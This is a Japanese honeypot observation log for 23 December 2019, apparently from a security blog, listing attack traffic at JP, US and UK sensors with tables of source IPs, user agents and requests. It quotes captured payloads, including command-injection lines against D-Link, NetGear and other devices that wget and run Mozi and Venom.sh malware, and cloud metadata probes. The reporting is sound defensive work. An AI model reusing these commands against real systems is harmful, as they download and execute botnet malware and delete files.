ハニーポット(仮) 観測記録 2019/12/23分です。
特徴
Location:JP
D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
Hakai/2.0によるスキャン行為
ZmEuによるスキャン行為
Apache Tomcatの管理画面へのスキャン行為
phpMyAdminへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。
Location:US
Adobe ColdFusionの脆弱性を狙うアクセス
D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
Hakai/2.0によるスキャン行為
Apache Tomcatの管理画面へのスキャン行為
phpMyAdminへのスキャン行為
User-AgentがHello, worldであるアクセス
を確認しました。
/shellに対して、ファイルダウンロードおよび実行を狙う以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://112[.]17[.]78[.]178:49125/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:UK
D-link製品の脆弱性を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
Hakai/2.0によるスキャン行為
Apache Tomcatの管理画面へのスキャン行為
phpMyAdminへのスキャン行為
ThinkPHPへのスキャン行為
FreePBXに対するログイン試行するアクセス
5[.]188[.]210[.]101に関する不正通信
を確認しました
他
アクセス数推移
JP:総アクセス数:64 (前日比:+18)
US:総アクセス数:29 (前日比:+6)
UK:総アクセス数:19 (前日比:-11)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 113.173.152.18 | Vietnam |
| 8 | 118.190.204.160 | China |
| 1 | 156.212.136.17 | Egypt |
| 1 | 163.172.5.252 | France |
| 1 | 172.104.242.173 | United States |
| 1 | 176.253.246.215 | United Kingdom |
| 8 | 221.199.188.68 | China |
| 1 | 41.34.222.191 | Egypt |
| 34 | 44.224.22.196 | United States |
| 1 | 49.167.5.162 | South Korea |
| 4 | 51.158.29.50 | France |
| 1 | 60.191.66.222 | China |
| 2 | 61.219.11.153 | Taiwan |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 24 | - |
| 1 | ApiTool |
| 14 | AWS Security Scanner |
| 2 | Hakai/2.0 |
| 1 | Mozilla/5.0 |
| 1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
| 16 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 4 | ZmEu |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 3 | - | ||
| 10 | CONNECT | 18[.]179[.]20[.]5:80 | HTTP/1.0 |
| 2 | GET | /elrekt.php | HTTP/1.1 |
| 1 | GET | /en/embeddedAuthRedirect.html?auth=javascript%3Aalert%28document.domain%29 | HTTP/1.1 |
| 2 | GET | /html/public/index.php | HTTP/1.1 |
| 2 | GET | http://169[.]254[.]169[.]254/ | HTTP/1.1 |
| 2 | GET | http://169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 2 | GET | http://example[.]com/ | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/ | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 2 | GET | /index.php | HTTP/1.1 |
| 4 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
| 2 | GET | /login.cgi?cli=aa%20aa%27;wget%20http://185[.]132[.]53[.]119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
| 2 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 | HTTP/1.1 |
| 2 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 2 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 2 | GET | /TP/index.php | HTTP/1.1 |
| 2 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
| 1 | POST | /editBlackAndWhiteList | HTTP/1.1 |
| 1 | \x03 | ||
| 10 | \x16\x03\x01 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 112.17.78.178 | China |
| 1 | 113.220.22.38 | China |
| 1 | 156.200.181.226 | Egypt |
| 1 | 156.206.230.161 | Egypt |
| 1 | 156.209.32.55 | Egypt |
| 1 | 156.213.42.187 | Egypt |
| 1 | 156.217.131.236 | Egypt |
| 4 | 157.52.156.49 | United States |
| 1 | 172.104.242.173 | United States |
| 1 | 185.128.41.50 | Switzerland |
| 1 | 197.39.138.223 | Egypt |
| 1 | 212.83.145.139 | France |
| 1 | 220.135.136.169 | Taiwan |
| 1 | 34.207.179.91 | United States |
| 2 | 39.105.172.178 | China |
| 1 | 41.233.57.152 | Egypt |
| 1 | 41.234.17.104 | Egypt |
| 1 | 41.235.48.250 | Egypt |
| 1 | 41.44.162.109 | Egypt |
| 1 | 45.136.108.65 | Germany |
| 1 | 60.191.66.222 | China |
| 2 | 61.219.11.153 | Taiwan |
| 1 | 62.11.51.254 | Italy |
| 1 | 66.169.87.5 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 10 | - |
| 1 | Cloud mapping experiment. Contact research@pdrlabs.net |
| 10 | Hakai/2.0 |
| 1 | Hello, world |
| 3 | Help |
| 1 | Java/1.8.0_131 |
| 1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
| 2 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 3 | - | ||
| 1 | GET | /CFIDE/administrator/ | HTTP/1.1 |
| 1 | GET | /clientaccesspolicy.xml | HTTP/1.1 |
| 1 | GET | http://www[.]gigablast[.]com/?0.107585453268129836052083105792 | HTTP/1.1 |
| 1 | GET | http://www[.]gigablast[.]com/?0.34610254866507391002596242980 | HTTP/1.1 |
| 1 | GET | http://www[.]youdao[.]com/?0.6301426007812841830263138278448 | HTTP/1.1 |
| 1 | GET | http://www[.]youdao[.]com/?0.701096138979681914460831453152 | HTTP/1.1 |
| 1 | GET | /index.php | HTTP/1.1 |
| 10 | GET | /login.cgi?cli=aa%20aa%27;wget%20http://185[.]132[.]53[.]119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ | HTTP/1.1 |
| 2 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http://112[.]17[.]78[.]178:49125/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
| 3 | POST | /editBlackAndWhiteList | HTTP/1.1 |
| 1 | \x03 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 8 | 116.196.90.2 | China |
| 1 | 156.220.65.84 | Egypt |
| 1 | 156.223.152.237 | Egypt |
| 1 | 172.104.242.173 | United States |
| 1 | 177.46.141.231 | Brazil |
| 1 | 186.39.113.33 | Argentina |
| 1 | 189.223.231.146 | Mexico |
| 1 | 23.225.183.234 | United States |
| 1 | 3.9.175.81 | United Kingdom |
| 1 | 47.21.32.102 | United States |
| 1 | 5.188.210.101 | Russia |
| 1 | 63.247.65.162 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 3 | - |
| 2 | Hakai/2.0 |
| 1 | Help |
| 1 | libwww-perl/6.43 |
| 1 | Mozilla/5.0 Gecko/20100101 |
| 1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
| 8 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 1 | python-requests/2.22.0 |
| 1 | Python-urllib/3.5 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 1 | GET | //admin/config.php?password%5B0%5D=bebydviyx&username=admin | HTTP/1.1 |
| 1 | GET | /elrekt.php | HTTP/1.1 |
| 1 | GET | /.git/HEAD | HTTP/1.1 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 2 | GET | ../../ | HTTP |
| 1 | GET | http://5[.]188[.]210[.]101/echo.php | HTTP/1.1 |
| 1 | GET | /index.php | HTTP/1.1 |
| 2 | GET | /login.cgi?cli=aa%20aa%27;wget%20http://185[.]132[.]53[.]119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /phpmyadmin//index.php | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | POST | /editBlackAndWhiteList | HTTP/1.1 |
